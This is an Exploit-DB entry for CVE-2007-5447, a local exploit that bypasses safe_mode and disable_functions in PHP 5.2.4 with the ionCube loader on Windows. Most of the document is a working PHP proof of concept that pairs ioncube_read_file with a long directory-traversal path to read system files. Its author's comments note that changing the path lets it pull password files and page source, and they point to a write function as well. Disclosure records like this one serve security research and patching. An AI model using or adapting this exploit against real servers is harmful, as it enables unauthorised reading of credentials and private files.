PHP 5.2.4 ionCube extension safe_mode / disable_functions Bypass

ID EDB-ID:4517
Type exploitdb
Reporter shinnai
Modified 2007-10-11T00:00:00


PHP 5.2.4 ionCube extension safe_mode / disable_functions Bypass. CVE-2007-5447. Local exploit for windows platform

//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Technical details:
//ionCube version: 6.5
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)

//php.ini settings:
//safe_mode = On
//disable_functions = ioncube_read_file, readfile

//This is useful to obtain juicy informations but also to retrieve source
//code of php pages, password files, etc... you just need to change file path.
//Anyway, don't worry, nobody will read your obfuscated code :)

//greetz to: BlackLight for help me to understand better PHP

//This extension contains even an interesting ioncube_write_file function...

if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");

$path = str_repeat("..\\", 20);

$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)

$MyBoot_ioncube = ioncube_read_file($path."boot.ini");

echo $MyBoot_readfile;

echo "<br><br>ionCube output:<br><br>";

echo $MyBoot_ioncube;

# [2007-10-11]